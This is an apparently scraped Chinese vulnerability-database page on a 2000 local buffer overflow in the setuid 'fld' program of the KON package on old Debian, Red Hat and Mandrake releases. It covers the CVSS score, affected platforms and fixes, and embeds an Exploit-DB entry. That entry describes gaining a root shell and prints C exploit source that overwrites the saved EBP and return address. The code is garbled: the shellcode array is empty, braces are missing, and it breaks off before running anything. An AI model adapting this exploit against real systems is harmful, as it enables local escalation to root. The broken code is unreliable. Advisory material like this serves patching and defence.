发布时间 :2000-06-21 00:00:00
修订时间 :2008-09-10 15:05:12

[原文]Buffer overflow in fld program in Kanji on Console (KON) package on Linux may allow local users to gain root privileges via an input file containing long CHARSET_REGISTRY or CHARSET_ENCODING settings.

[CNNVD]多个Linux供应商KON (Kanji On Console)缓冲区溢出漏洞(CNNVD-200006-086)

        Linux Kanji on Console (KON)包中fld程序存在缓冲区溢出漏洞。本地用户借助包含CHARSET_REGISTRY或 CHARSET_ENCODING设置的输入文件可以提升根特权。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:debian:debian_linux:2.0Debian Debian Linux 2.0
cpe:/o:mandrakesoft:mandrake_linux:6.1MandrakeSoft Mandrake Linux 6.1
cpe:/o:redhat:linux:6.2Red Hat Linux 6.2
cpe:/o:debian:debian_linux:2.2Debian Debian Linux 2.2
cpe:/o:redhat:linux:5.1Red Hat Linux 5.1
cpe:/o:redhat:linux:6.1Red Hat Linux 6.1
cpe:/o:mandrakesoft:mandrake_linux:7.1MandrakeSoft Mandrake Linux 7.1
cpe:/o:redhat:linux:5.0Red Hat Linux 5.0
cpe:/o:debian:debian_linux:2.1Debian Debian Linux 2.1
cpe:/o:redhat:linux:5.2Red Hat Linux 5.2
cpe:/o:debian:debian_linux:2.3Debian Debian Linux 2.3
cpe:/o:mandrakesoft:mandrake_linux:7.0MandrakeSoft Mandrake Linux 7.0

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  BUGTRAQ  20000619 Problems with "kon2" package
(UNKNOWN)  BID  1371

- 漏洞信息

多个Linux供应商KON (Kanji On Console)缓冲区溢出漏洞
高危 缓冲区溢出
2000-06-21 00:00:00 2005-10-20 00:00:00
        Linux Kanji on Console (KON)包中fld程序存在缓冲区溢出漏洞。本地用户借助包含CHARSET_REGISTRY或 CHARSET_ENCODING设置的输入文件可以提升根特权。

- 公告与补丁

        Remove the setuid bit on kon and fld.

- 漏洞信息 (20024)

Mandrake 7.0/7.1,RedHat Kon2 0.3.9 fld Input File Overflow (EDBID:20024)
linux local
2000-08-01 Verified
0 E-Ligth
N/A [点击下载]

KON (Kanji On Console) is a package for displaying Kanji text under Linux and comes with two suid binaries which are vulnerable to buffer overflows. "fld", one of the vulnerable programs, accepts options input from a text file. Through this mechanism it is possible to input arbitrary code into the stack and spawn a root shell. The other binary, kon, suffers from a buffer overflow as well. The buffer overflow in kon can be exploited via the -StartupMessage command line option, and fld via the command line options: -t bdf <file to be read> 

/* Exploit code for /usr/bin/fld
   Compile with : gcc -o xp xp.c
   Made by : E-Ligth (Hugo Oliveira Dias) 01/08/2000 

 #include <string.h>
 #include <stdlib.h>
 #include <stdio.h>

 #define OFFSET 0
 #define BUFFSIZE 541
 #define NOP 0x90

 char shellcode[] =

 unsigned long get_esp(void) {
    __asm__("movl %esp,%eax");

 int main(int argc,char *argv[])
   int bsize = BUFFSIZE;
   int offset = OFFSET;
  int i;
   long *addr_ptr, addr;
   char *ptr,*buf,*env;
   char arg[30];

  if (!(buf = malloc(bsize))) {
      printf("Can't allocate memory.\n"); 
  ptr = buf;
  for (i = 0; i < bsize; i++)
     *(ptr++) = shellcode[i];
  buf[519] = 0x3c; /* Saved EBP 0xbffffa3c */ 
  buf[520] = 0xfa;
  buf[521] = 0xff;
  buf[522] = 0xbf;
  buf[523] = 0x10; /* Return Address  0xbffff710 */ 
  buf[524] = 0xf7;
  buf[525] = 0xff;
  buf[526] = 0xbf;
  buf[527] = 0x90; /* fp variable 0x804bf90 */
  buf[528] = 0xbf;
  buf[529] = 0x04;
  buf[530] = 0x08;
  buf[531] = 0xef; /* variable thats shouldn�t be destroyed 0xbffffbef */
  buf[532] = 0xfb;  
  buf[533] = 0xff;
  buf[534] = 0xbf;
  buf[535] = 0x60; /* variable thats shouldn�t be destroyed 0x40013460 */
  buf[536] = 0x34;
  buf[537] = 0x01;
  buf[538] = 0x40;
  memcpy(buf,"-type \"",7);
  buf[540] = '\0';
  buf[539] = '\"';
  memcpy(arg,"-type bdf ./code",16);
  arg[16] = '\0';   
  env = (char *) malloc(bsize + 10);

- 漏洞信息

Kanji on Console (KON) fld Input File Overflow
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

A local overflow exists in Kanji On Console's (KON) fld command. The fld command fails to correctly check the size of data being entered in with the CHARSET_REGISTRY and CHARSET_ENCODING settings resulting in a buffer overflow. With a specially crafted request, an attacker can cause execute arbitrary code with root privileges resulting in a loss of integrity.

- 时间线

2000-06-19 Unknow
2000-06-19 Unknow

- 解决方案

Upgrade to version 0.3.9b or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Remove the setuid bit on fld.

- 相关参考

- 漏洞作者